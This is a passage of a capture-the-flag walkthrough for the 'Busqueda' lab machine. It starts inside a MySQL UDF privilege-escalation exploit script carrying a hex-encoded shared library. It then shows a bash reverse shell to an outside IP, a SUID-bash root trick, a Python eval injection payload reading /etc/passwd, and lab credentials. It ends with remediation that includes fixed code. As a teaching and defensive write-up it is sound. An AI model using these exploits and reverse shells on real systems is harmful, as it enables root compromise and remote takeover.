000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000";

shellcode = shellcode_x32
if (platform.architecture()[0] == '64bit'):
 shellcode = shellcode_x64

# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root
# username='root'
# password=''

###
#if len(sys.argv) != 2:
#	print "Usage: %s <username> <password>" % argv[0]

#username=sys.argv[1];
#password=sys.argv[2];
###

parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
parser.add_argument('--password', '-p', help='MySQL password', type=str)

args = parser.parse_args()

username=args.username
password=args.password	

if not password:
	password=''
	
cmd='mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select @@plugin_dir \G"'
plugin_str = subprocess.check_output(cmd, shell=True).decode('utf-8')
plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str)
res = bool(plugin_dir)

if not res:
 print("Error: could not locate the plugin directory")
 sys.exit(1);
	
plugin_dir_ = plugin_dir.group(1)

print("Plugin dir is %s" % plugin_dir_)

# file to save the udf so file to
udf_filename = 'udf' + str(random.randint(1000,10000)) + '.so'
udf_outfile = plugin_dir_ + udf_filename

# alternative way:
# set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir;

print("Trying to create a udf library...");
os.system('mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'%s\' \G"' % udf_outfile)
res = os.path.isfile(udf_outfile)

if not res:
 print("Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile)
 sys.exit(1);

print("UDF library crated successfully: %s" % udf_outfile);
print("Trying to create sys_exec...")
os.system('mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\'\G"' % udf_filename)

print("Checking if sys_exec was crated...")
cmd='mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"';
res = subprocess.check_output(cmd, shell=True);

if (res == ''):
	print("sys_exec was not found (good luck next time!)")

if res:
	print("sys_exec was found: %s" % res)
	print("Generating a suid binary in /tmp/sh...")
	os.system('mysql -h 127.0.0.1 -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh\')"')
	
	print("Trying to spawn a root shell...")
	pty.spawn("/tmp/sh");

/images/busqueda/busqueda04.png
Failed Local Privilege Escalation

Then the thought to explore the gitea repository came. Started an ssh tunnel and logged in with the tabulated details and downloaded the repositories.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# open a tunnel to access gitea
ssh -L 3000:127.0.0.1:3000 -N -f svc@searcher.htb # on prompt submit: jh1usoih2bkjaspwe92

# unpack the downloads
unzip Searcher_site-main.zip 
unzip scripts-main.zip

# to kill the tunnel session afterward use
lsof -i:3000 | grep ssh   # get the PID
kill -9 $PID
UsernamePasswordDownload
codyjh1usoih2bkjaspwe92Searcher_site
administratoryuiu1hoiu4i5ho1uhscripts

/images/busqueda/busqueda05.png
Accessing Gitea

/images/busqueda/busqueda06.png
Searcher Site Script

/images/busqueda/busqueda07.png
Searcher Site Script

I fretted with each users account for sensentive credentials. Studied the scripts source code and immediately noticed why the command sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup was throwing an error. It expects a file named ‘full-checkup.sh’ within the current path of execution. system-checkup.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

#!/bin/bash
import subprocess
import sys

actions = ['full-checkup', 'docker-ps','docker-inspect']

def run_command(arg_list):
    r = subprocess.run(arg_list, capture_output=True)
    if r.stderr:
        output = r.stderr.decode()
    else:
        output = r.stdout.decode()

    return output


def process_action(action):
    if action == 'docker-inspect':
        try:
            _format = sys.argv[2]
            if len(_format) == 0:
                print(f"Format can't be empty")
                exit(1)
            container = sys.argv[3]
            arg_list = ['docker', 'inspect', '--format', _format, container]
            print(run_command(arg_list)) 
        
        except IndexError:
            print(f"Usage: {sys.argv[0]} docker-inspect <format> <container_name>")
            exit(1)
    
        except Exception as e:
            print('Something went wrong')
            exit(1)
    
    elif action == 'docker-ps':
        try:
            arg_list = ['docker', 'ps']
            print(run_command(arg_list)) 
        
        except:
            print('Something went wrong')
            exit(1)

    elif action == 'full-checkup':
        try:
            arg_list = ['./full-checkup.sh']
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)
            

if __name__ == '__main__':

    try:
        action = sys.argv[1]
        if action in actions:
            process_action(action)
        else:
            raise IndexError

    except IndexError:
        print(f'Usage: {sys.argv[0]} <action> (arg1) (arg2)')
        print('')
        print('     docker-ps     : List running docker containers')
        print('     docker-inspect : Inpect a certain docker container')
        print('     full-checkup  : Run a full system checkup')
        print('')
        exit(1)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

# start a listener on the attacker machine
nc -lvnp 9011

# create a reverse shell script at the home directory of the victim machine
#-nano full-checkup.sh-#
#! /bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.48/9011 0>&1"
#-full-checkup.sh-#

chmod 775 full-checkup.sh       # make the script executable

# execute the vulnerable command
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

/images/busqueda/busqueda08.png
Privilege Escalated

Privilege Escalation Alternative Technique

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# create a reverse shell script at the home directory of the victim machine
#-nano full-checkup.sh-#
#! /bin/bash
chmod +s /usr/bin/bash
#-full-checkup.sh-#

chmod 775 full-checkup.sh

# execute the vulnerable command
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[+] Done!

/usr/bin/bash -p
cat /root/root.txt    # capture root flag

Exfiltration

We earlier exfiltrated the source codes and some sensitive data. Amongst which are the users and database credentials.

Remediation

Fixing the Foothold Vector app.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

from flask import Flask, render_template, request, redirect
from searchor import Engine
import subprocess


app = Flask(__name__)

@app.route('/')
def index():
    return render_template('index.html', options=Engine.__members__, error='')

@app.route('/search', methods=['POST'])
def search():
    try:
        engine = request.form.get('engine')
        query = request.form.get('query')
        auto_redirect = request.form.get('auto_redirect')
        
        if engine in Engine.__members__.keys():
            arg_list = ['searchor', 'search', engine, query]
            r = subprocess.run(arg_list, capture_output=True)
            url = r.stdout.strip().decode()
            if auto_redirect is not None:
                return redirect(url, code=302)
            else:
                return url

        else:
            return render_template('index.html', options=Engine.__members__, error="Invalid engine!")

    except Exception as e:
        print(e)
        return render_template('index.html', options=Engine.__members__, error="Something went wrong!")

if __name__ == '__main__':
    app.run(debug=False)

Lines 15, 20 - 22 of the above source code resulted in gaining a foothold in the system. The application developer trusted the user input without sanitatizing it and wrongly implemented the subprocess python module in their code.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

13	def search():
14	    try:
15	        engine = request.form.get('engine')
16	        query = request.form.get('query')
17	        auto_redirect = request.form.get('auto_redirect')
18	        
19	        if engine in Engine.__members__.keys():
20	            arg_list = ['searchor', 'search', engine, query]
21	            r = subprocess.run(arg_list, capture_output=True)
22	            url = r.stdout.strip().decode()

Generally the subprocess module is a very delicate module, I will lean towards finding some other library to implement that feature since the developer needed to return the full url path to the user in event they didn’t check auto-redirect. OS Command Injection in Python - SecureFlag and Command injection prevention for Python - Semgrep discussed how to prevent the flaw. I would also argue that this foothold was made possible due the slightly sophisticated nature of the payload using eval and compile built-in python functions. Take a look at the attack POC below. Note that http listener decode url encoded parameters, and the code implictly executes python code since system is running a python3 interpreter.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

python3
>>> eval("dir()")
['__annotations__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__']

>>> eval(compile("dir()",'','single'))
['__annotations__', '__builtins__', '__doc__', '__loader__', '__name__', '__package__', '__spec__']

# the above commands returns the loaded functions since that is what dir() does. reference: https://docs.python.org/3/library/functions.html#dir

>>> eval(compile('''__import__('os').system('cat /etc/passwd')''','','single'))
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

>>> import subprocess
>>> subprocess.run(["cat","/etc/passwd"], capture_output=True)
CompletedProcess(args=['cat', '/etc/passwd'], returncode=0, stdout=b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n', stderr=b'')

>>> payload="eval(compile('''__import__('os').system('cat /etc/passwd')''','','single'))"
>>> subprocess.run(["python3","-c",payload], capture_output=True)
CompletedProcess(args=['python3', '-c', "eval(compile('''__import__('os').system('cat /etc/passwd')''','','single'))"], returncode=0, stdout=b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n

Fixing the Privilege Escalation Vector The privilege escalation can be attributed to the carelessness of the developer and administrator. The users failed to enable 2FA on their gitea accounts. There is also a problem of password reuse, a good practice is that service accounts have entirely different credentials from user accounts. The disclosure of the mysql and gitea credential from the container is something perculiar to containers. They need this credentials to run and can even be found in their logs.

Although the administrator did well to restrict access to the scripts, assuming the system-checkup.py will always be run from within the scripts directory thus interpolating the full-checkup.sh from same path resulted to gaining a root privilege. using the absolute path to the file would have prevented this. snippet fixing the flaw

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

2	import subprocess
2	import sys
3	
4	import os
5	script_path = os.path.abspath(__file__)
7	file_path = os.path.join(os.path.dirname(script_path), 'full-checkup.sh')


49   elif action == 'full-checkup':
50        try:
51            arg_list = [file_path]

fixed system-checkup.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

#!/bin/bash
import subprocess
import sys

import os
script_path = os.path.abspath(__file__)
file_path = os.path.join(os.path.dirname(script_path), 'full-checkup.sh')

actions = ['full-checkup', 'docker-ps','docker-inspect']

def run_command(arg_list):
    r = subprocess.run(arg_list, capture_output=True)
    if r.stderr:
        output = r.stderr.decode()
    else:
        output = r.stdout.decode()

    return output


def process_action(action):
    if action == 'docker-inspect':
        try:
            _format = sys.argv[2]
            if len(_format) == 0:
                print(f"Format can't be empty")
                exit(1)
            container = sys.argv[3]
            arg_list = ['docker', 'inspect', '--format', _format, container]
            print(run_command(arg_list)) 
        
        except IndexError:
            print(f"Usage: {sys.argv[0]} docker-inspect <format> <container_name>")
            exit(1)
    
        except Exception as e:
            print('Something went wrong')
            exit(1)
    
    elif action == 'docker-ps':
        try:
            arg_list = ['docker', 'ps']
            print(run_command(arg_list)) 
        
        except:
            print('Something went wrong')
            exit(1)

    elif action == 'full-checkup':
        try:
            arg_list = [file_path]
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)
            

if __name__ == '__main__':

    try:
        action = sys.argv[1]
        if action in actions:
            process_action(action)
        else:
            raise IndexError

    except IndexError:
        print(f'Usage: {sys.argv[0]} <action> (arg1) (arg2)')
        print('')
        print('     docker-ps     : List running docker containers')
        print('     docker-inspect : Inpect a certain docker container')
        print('     full-checkup  : Run a full system checkup')
        print('')
        exit(1)

notice that the full-checkup subcommand now runs the intended action. The attacker was unable to gain root privilege after crafting his own full-checkup.sh file.

/images/busqueda/busqueda09.png
Privilege Escalation Remediated

References

Comand Injection in Python - StackHawk, Introduction to Software Security - Loren Kohnfelder et al, Exploiting Python Code Injection in Web Application - Seth Art Exploiting Python’s Eval - Floyd’s

I build secure and reliable infrastructures, hunt for flaws in insecure systems and remediate them to meet compliance. Book a consultation session.